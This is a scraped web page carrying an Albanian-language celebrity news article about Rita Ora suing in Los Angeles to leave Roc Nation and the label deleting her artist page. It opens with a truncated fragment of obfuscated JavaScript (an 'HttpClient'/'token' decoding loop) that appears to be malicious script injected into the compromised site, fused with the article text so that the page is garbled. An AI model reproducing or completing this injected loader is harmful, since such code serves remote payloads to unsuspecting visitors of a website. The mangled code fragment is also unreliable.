;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Rita Ora ‘zhduket’ nga Roc Nation

By

Të martën, Rita Ora u bë lajm në mediat globale, kësaj rradhe jo për sukseset në karrierë por për një vendim të papritur dhe befasues.

Këngëtarja me famë botërore deponoi një kërkesë në Gjykatën Supreme të Los Angeles ku ajo potenconte se marrëdhëniet me Roc Nation janë ‘dëmtuar në mënyrë të pakthyeshme”, shtatë vite pas nënshkrimit të saj.

Padia hidhte në dritë edhe relacionin e Ritës me Jay Z të cilin e cilëson si një partner të mrekullueshëm në label deri në momentin kur label-i nisi menagjimin e sportistëve dhe kur u lançua aplikacioni Tidal Music. Që nga ai moment, Ora nuk pa pasur asnjë marrëdhënie me dikë në label.

E megjithatë duket se as Roc Nation nuk ka pritur gjatë, duke zhdukur çdo gjurmë të këngëtares në databasën e tyre online.

Në faqen zyrtare të internetit, kur kërkohet për artistë, fare lehtë gjenden emra si Rihanna apo Emeli Sande por e njejta nuk mund të thuhet edhe për Ritën.

”Faqja të cilën po e kërkon nuk ekziston” – shkruan kur kërkohet për këngëtaren. Mbetet të shihet se si do reflektojë ky hap i yllit me origjinë nga Kosova në karrierën e saj, e cila megjithatë, sipas asaj që ka deklaruar, gjithçka viteve të fundit e ka financuar dhe ndërtuar vetë. /Prive.al/

1450514242809

Artikuj të ngjashëm